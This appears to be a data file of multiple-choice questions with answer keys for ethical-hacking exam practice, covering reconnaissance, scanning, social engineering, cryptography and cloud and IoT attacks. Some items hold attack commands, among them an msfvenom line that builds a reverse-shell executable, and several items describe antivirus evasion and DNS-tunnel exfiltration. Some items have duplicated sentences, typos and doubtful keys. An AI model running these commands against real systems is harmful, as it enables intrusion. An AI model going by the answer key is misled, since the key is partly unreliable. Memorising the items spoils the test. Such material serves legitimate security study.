    ("Identify the type of hacker following description: When finding a zero-day vulnerability on a public-facing system, a hacker sends an email to the owner of the public system describing the problem and how the owner can protect themselves from that vulnerability.", "White hat", ["Gray hat", "Red hat", "White hat", "Black hat"]),
    ("Which of the following tiers in the three-tier application architecture is responsible for moving and processing data between them?", "Logic tier", ["Data tier", "Presentation tier", "Logic tier", "Application Layer"]),
    ("While browsing his social media feed, Jacob noticed Jane's photo with the caption: \"Learn more about your friends,\" as well as several personal questions under the post. Jacob is suspicious and texts Jane with questions about this post. Jane confirms that she did indeed post it. With the assurance that the post is legitimate, Jacob responds to the questions on the friend's post. A few days later, Jacob tries to log into his bank account and finds out that it has been compromised and the password was changed. What most likely happened?", "Jacob inadvertently provided the answers to his security questions when responding to Jane's post.", ["Jacob's bank-account login information was brute-forced.", "Jacob's password was stolen while he was enthusiastically participating in the survey.", "Jacob inadvertently provided the answers to his security questions when responding to Jane's post.", "Jacob's computer was infected with a Banker Trojan."]),
    ("Which of the following attacks can you perform if you know that the web server handles the \"(../)\" (character string) incorrectly and returns the file listing of a folder structure of the server?", "Directory traversal", ["Denial of service.", "Directory traversal.", "Cross-site scripting.", "SQL injection."]),
    ("Identify the phase of the APT lifecycle that the hacker is in at the moment according to the scenario given below: The hacker prepared for an attack and attempted to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Thanks to the successful attack, he deployed malware on the target system to establish an outbound connection and began to move on.", "Initial intrusion", ["Preparation", "Cleanup", "Persistence", "Initial intrusion"]),
    ("Imagine the following scenario: The hacker monitored and intercepted already established traffic between the victim and a host machine to predict the victim's ISN. The hacker sent spoofed packets with the victim's IP address to the host machine using the ISN. After this manipulation, the host machine responded with a packet having an incremented ISN. After this manipulation, the host machine responded with a packet having an incremented ISN. The victim's connection was interrupted, and the hacker was able to connect with the host machine on behalf of the victim. Which of the following attacks did the hacker perform?", "TCP/IP hijacking", ["UDP hijacking", "TCP/IP hijacking", "Blind hijacking", "Forbidden attack"]),
    ("Jonh, a security specialist, conducts a pentest in his organization. He found information about the emails of two employees in some public sources and is preparing a client-side backdoor to send to the employees via email. Which of the stages of the cyber kill chain does John perform?", "Weaponization", ["Exploitation", "Command and control", "Weaponization", "Reconnaissance"]),
    ("Which of the following is a file on a web server that can be misconfigured and provide sensitive information for a hacker, such as verbose error messages?", "php.ini", ["idq.dll", "httpd.conf", "php.ini", "administration.config"]),
    ("Identify the correct syntax for ICMP scan on a remote computer using hping2.", "hping2 -1 target.domain.com", ["hping2 -1 target.domain.com", "hping2 target.domain.com", "hping2 --l target.domain.com", "hping2 --set-ICMP target.domain.com"]),
    ("You need to send an email containing confidential information. Your colleague advises you to use PGP to be sure that the data will be safe. What should you use to communicate correctly using this type of encryption?", "Use your colleague's public key to encrypt the message.", ["Use your own private key to encrypt the message.", "Use your own public key to encrypt the message.", "Use your colleague's public key to encrypt the message.", "Use your colleague's private key to encrypt the message."]),
    ("The attacker is trying to cheat one of the employees of the target organization by initiating fake calls while posing as a legitimate employee. Also, he sent phishing emails to steal employee's credentials and further compromise his account. Which of the following techniques did the attacker use?", "Social engineering", ["Password reuse", "Social engineering", "Insider threat", "Reverse engineering"]),
    ("Jennys wants to send a digitally signed message to Molly. What key will Jennys use to sign the message, and how will Molly verify it?", "Jennys will sign the message with her private key, and Molly will verify that the message came from Jennys by using Jenny’s public key", ["Jennys will sign the message with her private key, and Molly will verify that the message came from Jennys by using Jenny’s public key", "Jennys will sign the message with Molly’s private key, and Molly will verify that the message came from Jennys by using Jenny’s public key", "Jennys will sign the message with Molly’s public key, and Molly will verify that the message came from Jennys by using Jenny’s public key", "Jennys will sign the message with her public key, and Molly will verify that the message came from Jenny's by using Jenny's private key."]),
    ("You must bypass the firewall. To do this, you plan to use DNS to perform data exfiltration on an attacked network. You embed malicious data into the DNS protocol packets. DNSSEC can't detect these malicious data, and you successfully inject malware to bypass a firewall and maintain communication with the victim machine and C&C server. Which of the following techniques would you use in this scenario?", "DNS tunnelling", ["DNS enumeration", "DNSSEC zone walking", "DNS cache snooping", "DNS tunnelling"]),
    ("Which of the following describes сross-site request forgery?", "A browser makes a request to a server without the user's knowledge.", ["A request sent by a malicious user from a browser to a server.", "A server makes a request to another server without the user's knowledge.", "Modifying the request by the proxy server between the client and the server.", "A browser makes a request to a server without the user's knowledge."]),
    ("The attacker, during the attack, installed a scanner on a machine belonging to one of the employees of the target organization and scanned several machines on the same network to identify vulnerabilities to exploit further. Which of the following type of vulnerability assessment tools employed the attacker?", "Network-based scanner.", ["Cluster scanner.", "Agent-based scanner.", "Network-based scanner.", "Proxy scanner."]),
    ("Which of the following programs is best used for analyzing packets on your wireless network?", "Wireshark with Airpcap", ["Wireshark with Airpcap", "Ethereal with Winpcap", "Airsnort with Airpcap", "Wireshark with Winpcap"]),
    ("You must discover all the active devices hidden by a restrictive firewall in the IPv4 range in a target network. Which of the following host discovery techniques will you use?", "ARP ping scan", ["UDP scan", "TCP Maimon scan", "ARP ping scan", "ACK flag probe scan"]),
    ("During testing execution, you established a connection with your computer using the SMB service and entered your login and password in plaintext. After the testing is completed, you need to delete the data about the login and password you entered so that no one can use it. Which of the following files do you need to clear?", ".bash_history", [".bash_history", ".profile", ".xsession-log", ".bashrc"]),
    ("Identify the footprinting technique by description: Using this technique, an attacker can gather domain information such as the target domain name, contact details of its owner, expiry date, and creation date. Also, using this information, an attacker can create a map of the organization’s network and misleads domain owners with social engineering to obtain internal details of its network.", "Whois footprinting", ["VPN footprinting", "Email footprinting", "VoIP footprinting", "Whois footprinting"]),
    ("You have been assigned the task of checking the implementation of security policies in the company. During the audit, you found that a user from the IT department had a dial-out modem installed. Which of the following security policies should you check to see if dial-out modems are allowed?", "Remote-access policy", ["Acceptable-use policy", "Permissive policy", "Firewall policy", "Remote-access policy"]),
    ("Andy, the evil hacker, wants to collect information about Nick. He discovered that Nick's organization recently purchased new equipment. Andy decided to call Nick masquerading as a legitimate customer support executive, informing him that their new systems need to be serviced for proper functioning and notified him that customer support would send a computer technician. Nick agreed and agreed on a date for a meeting with Andy. A few days later, Andy entered the territory of Nick's organization unhindered and gathered sensitive information by scanning terminals for passwords, searching for important documents in desks, and rummaging bins. What is the type of attack technique Andy used on Nick?", "Impersonation attack", ["Shoulder surfing attack", "Dumpster diving attack", "Eavesdropping attack", "Impersonation attack"]),
    ("Which of the following services runs directly on TCP port 445?", "Server Message Block (SMB)", ["Server Message Block (SMB)", "Telnet", "Network File System (NFS)", "Remote procedure call (RPC)"]),
    ("Your organization's network uses the network address 192.168.1.64 with mask 255.255.255.192, and servers in your organization's network are in the addresses 192.168.1.140, 192.168.1.141 and 192.168.1.142. The attacker who wanted to find them couldn't do it. He used the following command for the network scanning: nmap 192.168.1.64/28. Why couldn't the attacker find these servers?", "He is scanning from 192.168.1.64 to 192.168.1.78 because of the mask /28 and the servers are not in that range", ["He needs to add the command \"ip address\" just before the IP address", "He needs to change the address to 192.168.1.0 with the same mask", "The network must be dawn and the nmap command and IP address are ok", "He is scanning from 192.168.1.64 to 192.168.1.78 because of the mask /28 and the servers are not in that range"]),
    ("You use Docker architecture in your application to employ a client/server model. And you need to use a component that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks. Which of the following Docker components will you use for these purposes?", "Docker daemon", ["Docker client", "Docker daemon", "Docker objects", "Docker registries"]),
    ("You have decided to test your organization's website. For this purpose, you need a tool that can work as a proxy and save every request and response. Also, this tool must allow you to test parameters and headers manually to get more precise results than if using web vulnerability scanners. Which of the following tools is appropriate for your requirements?", "Burp suite", ["Maskgen", "Proxychains", "Burp suite", "S3Scanner"]),
    ("You enter the following command to get the necessary data: ping-* 6 192.168.120.114. Output: 1. Pinging 192.168.120.114 with 32 bytes of data: 2. Reply from 192.168.120.114: bytes=32 time<1ms TTL=128 3. Reply from 192.168.120.114: bytes=32 time<1ms TTL=128 4. Reply from 192.168.120.114: bytes=32 time<1ms TTL=128 5. Reply from 192.168.120.114: bytes=32 time<1ms TTL=128 6. Reply from 192.168.120.114: bytes=32 time<1ms TTL=128 7. Reply from 192.168.120.114: bytes=32 time<1ms TTL=128 8. Ping statistics for 192.168.120.114 9. Packets: Sent = 6, Received = 6, Lost = 0 (0% loss). 10. Approximate round trip times in milli-seconds: 11. Minimum = 0ms, Maximum = 0ms, Average = 0ms. Which of the following flags is hidden under \"*\"?", "n", ["n", "a", "s", "t"]),
    ("What is the common name of vulnerability disclosure programs opened by companies on HackerOne, Bugcrowd, etc.?", "Bug bounty program", ["Vulnerability hunting program", "Bug bounty program", "Ethical hacking program", "White-hat hacking program"]),
    ("Percival, the evil hacker, found the contact number of cybersecuritycompany.org on the internet and dialled the number, claiming himself to represent a technical support team from a vendor. He informed an employee of cybersecuritycompany that a specific server would be compromised and requested the employee to follow the provided instructions. Consequently, he prompted the victim to execute unusual commands and install malicious files, which were then used to collect and pass critical information to his machine. Which of the following social engineering techniques did Percival use?", "Quid pro quo", ["Quid pro quo", "Phishing", "Elicitation", "Diversion theft"]),
    ("Marketing department employees complain that their computers are working slow and every time they attempt to go to a website, they receive a series of pop-ups with advertisements. Which of the following type of malwares infected their systems?", "Adware", ["Trojan", "Adware", "Virus", "Spyware"]),
    ("You need to identify the OS of the target host. You want to use the Unicornscan tool to do this. As a result of using the tool, you got the TTL value and determined that the target system is running a Windows OS. Which of the following TTL values did you get when using the program?", "128", ["128", "255", "64", "138"]),
    ("Which of the following is the hacker's first step in conducting a DNS cache poisoning attack on a target organization?", "The hacker makes a request to the DNS resolver.", ["The hacker makes a request to the DNS resolver.", "The hacker queries a nameserver using the DNS resolver.", "The hacker uses TCP to poison the DNS resolver.", "The hacker forges a reply from the DNS resolver."]),
    ("Which of the following is a type of virus detection method where the anti-virus executes the malicious codes on a virtual machine to simulate CPU and memory activities?", "Code Emulation", ["Integrity checking", "Heuristic Analysis", "Code Emulation", "Scanning"]),
    ("Identify the attack technique by description: The attacker gains unauthorized access to the target network, remains there without being detected for a long time, and obtains sensitive information without sabotaging the organization.", "Advanced persistent threat.", ["Advanced persistent threat.", "Spear-phishing sites.", "Diversion theft.", "Insider threat."]),
    ("Identify the technique by description: During the execution of this technique, an attacker copies the entire website and its content on a local drive to view the complete profile of the site's directory structure, file structure, web pages, images, etc. Thanks to the information gathered using this technique, an attacker map the website's directories and gains valuable information.", "Website mirroring", ["Web cache poisoning", "Website defacement", "Website mirroring", "Session hijacking"]),
    ("John sent a TCP ACK segment to a known closed port on a firewall, but it didn't respond with an RST. What conclusion can John draw about the firewall he scanned?", "It's a stateful firewall.", ["It's a non-stateful firewall.", "There is no firewall.", "It's a stateful firewall.", "John can't draw any conclusions based on this information."]),
    ("At which of the following stages of the cyber kill chain does data exfiltration occur?", "Actions on objectives", ["Installation", "Weaponization", "Actions on objectives", "Command and control"]),
    ("Your friend installed the application from a third-party app store. After a while, some of the applications in his smartphone were replaced by malicious applications that appeared legitimate, and he began to receive a lot of advertising spam. Which of the following attacks has your friend been subjected to?", "Agent Smith attack", ["Clickjacking", "SMS phishing attack", "SIM card attack", "Agent Smith attack"]),
    ("Identify the attack used in the scenario below: The victim connected his iPhone to a public computer that the attacker had previously infected. After establishing the connection with this computer, the victim enabled iTunes Wi-Fi sync so that the device could continue communication with that computer even after being physically disconnected. Now the attacker who infected the computer can access the victim's iPhone and monitor all of the victim's activity on the iPhone, even after the device is out of the communication zone.", "iOS trustjacking", ["iOS trustjacking", "Exploiting SS7 vulnerability", "Man-in-the-disk attack", "iOS jailbreaking"]),
    ("You must to identifying open ports in the target network and determining whether the ports are online and any firewall rule sets are encountered. Which of the following nmap commands do you must use to perform the TCP SYN ping scan?", "nmap -sn -PS < target IP address >", ["nmap -sn -PS < target IP address >", "nmap -sn -PO < target IP address >", "nmap -sn -PP < target IP address >", "nmap -sn -PA < target IP address >"]),
    ("According to the configuration of the DHCP server, only the last 100 IP addresses are available for lease in subnet 10.1.4.0/23. Which of the following IP addresses is in the range of the last 100 addresses?", "10.1.5.200", ["10.1.4.254", "10.1.155.200", "10.1.3.156", "10.1.5.200"]),
    ("You have detected an abnormally large amount of traffic coming from local computers at night. You decide to find out the reason, do a few checks and find that an attacker has exfiltrated user data. Also, you noticed that AV tools could not find any malicious software, and the IDS/IPS has not reported on any non-whitelisted programs. Which of the following type of malware did the attacker use to bypass your company’s application whitelisting?", "Fileless malware", ["Phishing malware", "Logic bomb malware", "Fileless malware", "Zero-day malware"]),
    ("Viktor, a professional hacker, targeted an organization’s network to sniff all the traffic. During this process, Viktor plugged in a rogue switch to an unused port in the LAN with a priority lower than any other switch in the network so that he could make it a root bridge that will later allow him to sniff all the traffic in the network. What is the attack performed by Viktor in the above scenario?", "STP attack", ["DNS poisoning attack", "ARP spoofing attack", "STP attack", "VLAN hopping attack"]),
    ("Which of the following is an IOS jailbreaking technique that patches the kernel during the device boot to keep jailbroken after each reboot?", "Untethered jailbreaking", ["Semi-tethered jailbreaking", "Semi-untethered jailbreaking", "Tethered jailbreaking", "Untethered jailbreaking"]),
    ("An ethical hacker has already received all the necessary information and is now considering further actions. For example, infect a system with malware and use phishing to gain credentials to a system or web application. What phase of ethical hacking methodology is the hacker currently in?", "Gaining access", ["Reconnaissance", "Maintaining access", "Scanning", "Gaining access"]),
    ("You must choose a tool for monitoring your organization's website, analyzing the website's traffic, and tracking the geographical location of the users visiting the organization's website. Which of the following tools will you use for these purposes?", "Web-Stat", ["WAFW00F", "WebSite-Watcher", "Webroot", "Web-Stat"]),
    ("Which of the following online tools allows attackers to gather information related to the model of the IoT device and the certifications granted to it?", "FCC ID search", ["search.com", "Google image search", "FCC ID search", "EarthExplorer"]),
    ("You want to execute an SQLi attack. The first thing you check is testing the response time of a true or false response. Secondly, you want to use another command to determine whether the database will return true or false results for user IDs. Which two SQL injection types have you tried to perform?", "Time-based and boolean-based", ["Union-based and error-based", "Out of band and boolean-based", "Time-based and union-based", "Time-based and boolean-based"]),
    ("Identify the Bluetooth hacking technique, which refers to the theft of information from a wireless device through Bluetooth?", "Bluesnarfing", ["Bluesnarfing", "Bluesmacking", "Bluebugging", "Bluejacking"]),
    ("Which of the following keys can you share using asymmetric cryptography?", "Public keys", ["User passwords", "Private keys", "Public keys", "Public and private keys"]),
    ("Which of the following commands verify a user ID on an SMTP server?", "VRFY", ["NOOP", "VRFY", "EXPN", "RCPT"]),
    ("Your organization uses LDAP for accessing distributed directory services. An attacker knowing this can try to take advantage of an automated tool to anonymously query the LDAP service for sensitive information such as usernames, addresses, departmental details, and server names to launch further attacks on your organization. Which of the following tools can an attacker use to gather information from the LDAP service?", "JXplorer", ["Zabasearch", "ike-scan", "EarthExplorer", "JXplorer"]),
    ("You need to assess the system used by your employee. During the assessment, you found that compromise was possible through user directories, registries, and other system parameters. Also, you discovered vulnerabilities such as native configuration tables, incorrect registry or file permissions, and software configuration errors. Which of the following types of vulnerability assessments that you conducted?", "Host-based assessment", ["Host-based assessment", "Credentialed assessment", "Distributed assessment", "Database assessment"]),
    ("Ivan, the evil hacker, decided to attack the cloud services of the target organization. First of all, he decided to infiltrate the target's MSP provider by sending phishing emails that distributed specially created malware. This program compromised users' credentials, and Ivan managed to gain remote access to the cloud service. Further, he accessed the target customer profiles with his MSP account, compressed the customer data, and stored them in the MSP. After this, he used this information to launch further attacks on the target organization. Which of the following cloud attacks did Ivan perform?", "Cloud hopper attack", ["Cloud hopper attack", "Cloudborne attack", "Man-in-the-cloud (MITC) attack", "Cloud cryptojacking"]),
    ("The attacker wants to attack the target organization's Internet-facing web server. In case of a successful attack, he will also get access to back-end servers protected by a firewall. The attacker plans to use URL https://mainurl.com/feed.php?url=externalsite.com/feed/to to obtain a remote feed and alter the URL to the localhost to view all the local resources on the target server. Which of the following types of attacks is the attacker planning to perform?", "Server-side request forgery attack", ["Website defacement.", "Web server misconfiguration.", "Web cache poisoning attack.", "Server-side request forgery attack."]),
    ("Identify the technique by description: The attacker wants to create a botnet. Firstly, he collects information about a large number of vulnerable machines to create a list. Secondly, they infect the machines. The list is divided by assigning half of the list to the newly compromised machines. The scanning process runs simultaneously. This technique ensures a very fast spreading and installation of malicious code.", "Hit-list scanning technique", ["Topological scanning technique", "Permutation scanning technique", "Hit-list scanning technique", "Subnet scanning technique"]),
    ("You come to a party with friends and ask the apartment owner about access to his wireless network. It tells you the name of the wireless point and its password, but when you try to connect to it, the connection occurs without asking for a password. Which of the following attacks could have occurred?", "Evil twin attack", ["Evil twin attack", "Piggybacking attack", "Wireless sniffing", "Wardriving attack"]),
    ("Identify wireless security protocol by description: This wireless security protocol allows 192-bit minimum-strength security protocols and cryptographic tools to protect sensitive data, such as 256-bit Galois/Counter Mode Protocol (GCMP-256), 84-bit Hashed Message Authentication Mode with Secure Hash Algorithm (HMAC-SHA384), and Elliptic Curve Digital Signature Algorithm (ECDSA) using a 384-bit elliptic curve.", "WPA3-Enterprise", ["WPA3-Personal", "WPA2-Personal", "WPA3-Enterprise", "WPA2-Enterprise"]),
    ("You know that an attacker can create websites similar to legitimate sites in pharming and phishing attacks. Which of the following is the difference between them?", "Phishing attack: an attacker provides the victim with a URL that is either misspelled or looks similar to the legitimate website's domain name. Pharming attack: a victim is redirected to a fake website by modifying their host configuration file or exploiting DNS vulnerabilities.", ["Both pharming and phishing attacks are identical.", "Pharming attack: an attacker provides the victim with a URL that is either misspelled or looks similar to the legitimate website's domain name. Phishing attack: a victim is redirected to a fake website by modifying their host configuration file or exploiting DNS vulnerabilities.", "Both pharming and phishing attacks are purely technical.", "Phishing attack: an attacker provides the victim with a URL that is either misspelled or looks similar to the legitimate website's domain name. Pharming attack: a victim is redirected to a fake website by modifying their host configuration file or exploiting DNS vulnerabilities."]),
    ("To bypass firewalls using the DNS tunnelling method to exfiltrate data, you can use the NSTX tool. On which of the following ports should be run the NSTX tool?", "53", ["53", "23", "80", "50"]),
    ("Which of the following vulnerabilities will you use if you know that the target network uses WPA3 encryption?", "Dragonblood", ["Cross-site request forgery", "Dragonblood", "AP misconfiguration", "Key reinstallation attack"]),
    ("During a port scan on the target host, your colleague sends FIN/ACK probes and finds that an RST packet is sent in response by the target host, indicating that the port is closed. Which of the following port scanning techniques did your colleague use?", "TCP Maimon scan", ["Xmas scan", "ACK flag probe scan", "TCP Maimon scan", "IDLE/IPID header scan"]),
    ("During the scan, you found a serious vulnerability, compiled a report and sent it to your colleagues. In response, you received proof that they fixed this vulnerability a few days ago. How can you characterize this vulnerability?", "False-positive", ["False-positive", "False-true", "True-false", "False-negative"]),
    ("Which of the following rootkit types sits undetected in the core components of the operating system?", "Kernel rootkit", ["Hypervisor rootkit", "Kernel rootkit", "Firmware rootkit", "Hardware rootkit"]),
    ("Your organization has a public key infrastructure set up. Your colleague Bernard wants to send a message to Joan. Therefore, Bernard both encrypts the message and digitally signs it. Bernard uses ____ to encrypt the message for these purposes, and Joan uses ____ to confirm the digital signature.", "Joan's public key; Bernard's public key.", ["Joan's public key; Bernard's public key.", "Bernard's public key; Bernard's public key.", "Joan's public key; Joan's public key.", "Joan's private key; Bernard's public key."]),
    ("A post-breach forensic investigation revealed that a known vulnerability in Apache Struts was to blame for the Equifax data breach that affected 147 million people In September of 2017. At the same time fix was available from the software vendor for several months before the intrusion. In which of the following security processes has failed?", "Patch management", ["Patch management", "Vendor risk management", "Security awareness training", "Secure development lifecycle"]),
    ("Ivan, the evil hacker, decided to use Nmap scan open ports and running services on systems connected to the target organization's OT network. For his purposes, he enters the Nmap command into the terminal which identifies Ethernet/IP devices connected to the Internet and further gathered information such as the vendor name, product code and name, device name, and IP address. Which of the following commands did Ivan use in this scenario?", "nmap -Pn -sU -p 44818 --script enip-info < Target IP >", ["nmap -Pn -sT --scan-delay 1s --max-parallelism 1 -p < Port List > < Target IP >", "nmap -Pn -sT -p 46824 < Target IP >", "nmap -Pn -sT -p 102 --script s7-info < Target IP >", "nmap -Pn -sU -p 44818 --script enip-info < Target IP >"]),
    ("You need to transfer sensitive data of the organization between industrial systems securely. For these purposes, you have decided to use short-range wireless communication technology that meets the following requirements: - Protocol based on the IEEE 203.15.4 standard; - Range of 10-100 m. - Designed for small-scale projects which need wireless connection. Which of the following protocols will meet your requirements?", "Zigbee", ["MQTT", "Zigbee", "LPWAN", "NB-IoT"]),
    ("Which of the following is a correct example of using msfvenom to generate a reverse TCP shellcode for Windows?", "msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.12 LPORT=8888 -f exe > shell.exe", ["msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.12 LPORT=8888 -f c", "msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.12 LPORT=8888 -f exe > shell.exe", "msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.12 LPORT=8888 -f c", "msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.12 LPORT=8888 -f exe > shell.exe"]),
    ("A competitor organization has hired a professional hacker who could collect sensitive information about your organization. The hacker starts by gathering the server IP address of the target organization using Whois footprinting. After this, he entered the server IP address as an input to an online tool to retrieve information such as your organization's network range and identify the network topology and operating system used in the network. Which of the following tools did the hacker use for this purpose?", "ARIN", ["Baidu", "AOL", "ARIN", "DuckDuckGo"]),
    ("Which of the following ports must you block first in case that you are suspicious that an IoT device has been compromised?", "48101", ["8080", "22", "80", "48101"]),
    ("You performed a tool-based vulnerability assessment and found vulnerabilities. You have started to analyze these issues and found that they are not true vulnerabilities. How can you characterize these issues?", "False positives", ["True positives", "True negatives", "False positives", "False negatives"]),
    ("Antonio wants to infiltrate the target organization's network. To accomplish this task, he used a technique using which he encoded packets with Unicode characters. The target company’s IDS cannot recognize the packets, but the target web server can decode them. Which of the following techniques did Antonio use to evade the IDS system?", "Obfuscating", ["Obfuscating", "Urgency flag", "Session splicing", "Desynchronization"]),
    ("Your company follows the five-tier container technology architecture. Your colleagues use container technology to deploy applications/software. In this process, they include all dependencies, such as libraries and configuration files, binaries, and other resources that run independently from other processes in the cloud environment. Now they verify and validate image contents, sign images, and send them to the registries. At which of the following tiers are your colleagues currently working according to the five-tier container technology architecture?", "Tier-2: Testing and accreditation systems.", ["Tier-2: Testing and accreditation systems.", "Tier-3: Registries.", "Tier-4: Orchestrators.", "Tier-1: Developer machines."]),
    ("According to Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, which of the following ranges is the medium?", "4.0-6.9", ["4.0-6.9", "4.0-6.0", "3.0-6.9", "3.9-6.9"]),
    ("Identify the exploit framework whose capabilities include automated attacks on services, ports, applications and unpatched security flaws?", "Metasploit", ["Maltego", "Wireshark", "Nessus", "Metasploit"]),
    ("You were instructed to check the configuration of the webserver and you found that the server permits SSLv2 connections, and the same private key certificate is used on a different server that allows SSLv2 connections. You understand that this vulnerability makes the web server vulnerable to attacks as the SSLv2 server can leak key information. Which of the following attacks can an attacker perform using this vulnerability?", "DROWN attack", ["Padding oracle attack", "DUHK attack", "Side-channel attack", "DROWN attack"]),
    ("You simulate an attack on your organization's network resources and target the NetBIOS service. You decided to use the NetBIOS API for this attack and perform an enumeration. After finishing, you found that port 139 was open, and you could see the resources that could be accessed or viewed on a remote system. Also, you came across many NetBIOS codes during enumeration. Which of the following NetBIOS codes is used for obtaining the messenger service running for the logged-in user?", "<03>", ["<20>", "<00>", "<03>", "<1B>"]),
    ("Your company has hired Jack, a cybersecurity specialist, to conduct another pentest. Jack immediately decided to get to work. He launched an attack on the DHCP servers by broadcasting forged DHCP requests and leased all the DHCP addresses available in the DHCP scope until the server could not issue any more IP addresses. As a result of these actions, a DDoS attack occurred, and legitimate employees could not access the company's network. Which of the following attacks did Jack perform?", "DHCP starvation", ["VLAN hopping", "Rogue DHCP server attack", "STP attack", "DHCP starvation"]),
    ("Which of the following Metasploit Framework tool can be used to bypass antivirus?", "msfencode", ["msfcli", "msfpayload", "msfd", "msfencode"]),
    ("Identify the attack by description: The attacker decides to attack IoT devices. First, he will record the frequency required to share information between connected devices. Once he gets the necessary frequency, the attacker will capture the original data when the connected devices initiate commands. As soon as he collects original data, he will use tools such as URH to segregate the command sequence. The final step in this attack will be starting injecting the segregated command sequence on the same frequency into the IoT network, which repeats the captured signals of the devices.", "Replay attack.", ["Replay attack.", "Side-channel attack.", "Reconnaissance attack.", "Cryptanalysis attack."]),
    ("Identify the attack by description: This attack is performed at layer 7 to take down web infrastructure. During its execution, partial HTTP requests are sent to the web infrastructure or applications and upon receiving a partial request, the target server opens multiple connections and keeps waiting for the requests to complete.", "Slowloris attack", ["Phlashing", "Session splicing", "Slowloris attack", "Desynchronization"]),
    ("You need to describe the principal characteristics of the vulnerability and make a numerical estimate reflecting its severity using CVSS v3.0 to properly assess and prioritize the organization’s vulnerability management processes. As a result of the research, you received a basic score of 4.0 according to CVSS rating. What is the CVSS severity level of the vulnerability discovered?", "Medium", ["High", "Low", "Critical", "Medium"]),
    ("Which of the following files determines the basic configuration in an Android application, such as broadcast receivers, services, etc.?", "AndroidManifest.xml", ["resources.asrc", "APK.info", "classes.dex", "AndroidManifest.xml"]),
    ("Which of the following AAA protocols can use for authentication users connecting via analog modems, Digital Subscriber Lines (DSL), wireless data services, and Virtual Private Networks (VPN) over a Frame Relay network?", "RADIUS", ["TACACS", "Kerberos", "DIAMETER", "RADIUS"]),
    ("You found that sensitive data, employee usernames, and passwords are shared in plaintext, paving the way for hackers to perform successful session hijacking. Which of the following protocols, which can send data using encryption and digital certificates, will help solve this problem?", "FTPS", ["IP", "FTP", "HTTPS", "FTPS"]),
    ("John wants to attack the target organization, but before that, he needs to gather information. For these purposes, he performs DNS footprinting to gather information about DNS servers and identify the hosts connected to the target network. John is going to use an automated tool that can retrieve information about DNS zone data, including DNS domain names, computer names, IP addresses, DNS records, and network Whois records. Which of the following tools will John use?", "Bluto", ["Bluto", "zANTI", "Towelroot", "Knative"]),
    ("Identify the protocol used to secure an LDAP service against anonymous queries?", "NTLM", ["SSO", "NTLM", "RADIUS", "WPA"]),
    ("You need to use information security controls that create an appealing isolated environment for hackers to prevent them from compromising critical targets while simultaneously gathering information about the hacker. Which of the following will you use for this purpose?", "Honeypot", ["Firewall", "Intrusion detection system", "Botnet", "Honeypot"]),
    ("Which of the following Nmap commands perform a stealth scan?", "nmap –sS", ["nmap –sS", "nmap -sU", "nmap -sT", "nmap -sM"]),
    ("Johnny decided to gather information for identity theft from the target organization. He wants to redirect the organization’s web traffic to a malicious website. After some thought, he plans to perform DNS cache poisoning by exploiting the vulnerabilities in the DNS server software and wants to modify the original IP address of the target website to that of a malicious website. Which of the following techniques does Johnny plan to use?", "Pharming", ["Pretexting", "Pharming", "Skimming", "Wardriving"]),
    ("You have successfully executed the attack and launched the shell on the target network. Now you want to identify all the OS of machines running on this network. You are trying to run the Nmap command to perform this task and see the following: 1. hackeduser@hackedserver.~$ nmap -T4 -O 192.168.0.0/24 2. TCP/IP fingerprinting (for OS scan) xxxxxxx xxxxxx xxxxxxxxx. 3. QUITTING! Why couldn't the scan be performed?", "OS Scan requires root privileges.", ["The shell is not stabilized.", "OS Scan requires root privileges.", "The nmap syntax is wrong.", "The outgoing TCP/IP fingerprinting is blocked by the host firewall."]),
    ("Your company has decided to purchase a subscription to a cloud-hosted solution. After purchasing this solution, the only administrative task of your employees will be the management of user accounts. The provider will cover all hardware, operating system, and software administration (including patching and monitoring). Which of the following is this type of solution?", "Saas", ["Saas", "PaaS", "Caas", "Iaas"]),
    ("Which of the following is the firewall evasion scanning technique that uses a zombie system with low network activity?", "Idle scanning", ["Spoof source address scanning", "Decoy scanning", "Idle scanning", "Packet fragmentation scanning"]),
    ("You are the head of the Network Administrators department. And one of your subordinates uses SNMP to manage networked devices from a remote location. And one of your subordinates uses SNMP to manage networked devices from a remote location. To manage network nodes, your subordinate uses MIB, which contains formal descriptions of all network objects managed by SNMP. He accesses the contents of MIB by using a web browser either by entering the IP address and Lseries.mib or by entering the DNS library name and Lseries.mib. You know that your subordinate can retrieve information from a MIB that contains object types for workstations and server services. Which of the following types of MIB will your subordinate use to retrieve information about types for workstations and server services?", "LNMIB2.MIB", ["WINS.MIB", "DHCP.MIB", "LNMIB2.MIB", "MIB_II.MIB"]),
    ("You want to make your life easier and automate the process of updating applications. You decide to use a user-defined HTTP callback or push APIs that are raised based on trigger events. When this feature invokes, data is supplied to other applications so that users can instantly receive real-time information. What is the name of this technique?", "Webhooks", ["Webhooks", "Web shells", "SOAP API", "REST API"]),
    ("Recently your company set up a cloud computing service. Your system administrator reached out to a telecom company to provide Internet connectivity and transport services between the organization and the cloud service provider to implement this service. Which category does the telecom company fall in the above scenario according to NIST cloud deployment reference architecture?", "Cloud carrier", ["Cloud consumer", "Cloud carrier", "Cloud broker", "Cloud auditor"]),
    ("Ron, the hacker, is trying to crack an employee's password of the target organization utilizing a rainbow table. During the break-in, he discovered that upon entering a password that extra characters are added to the password after submitting. Which of the following countermeasures is the target company using to protect against rainbow tables?", "Password salting", ["Password salting", "Password hashing", "Password key hashing", "Account lockout"]),
    ("The attacker performs an attack during which, using a MITM attack technique, he sends his session ID using. Firstly the attacker obtains a valid session ID by logging into a service and later feeds the same session ID to the victim. The session ID links the victim to the attacker's account page without disclosing any information to the victim. Then the attacker waits until the victim clicks on the link, and after this, the sensitive payment details entered in a form are linked to the attacker's account. Which of the following attacks was the attacker performing?", "Session donation", ["Session fixation", "CRIME", "Session donation", "Forbidden"]),
    ("Which of the following is API designed to reduce complexity and increase the integrity of updating and changing which uses a web service that uses HTTP methods such as PUT, POST, GET, and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application?", "RESTful API", ["REST API", "JSON-RPC", "RESTful API", "SOAP API"]),
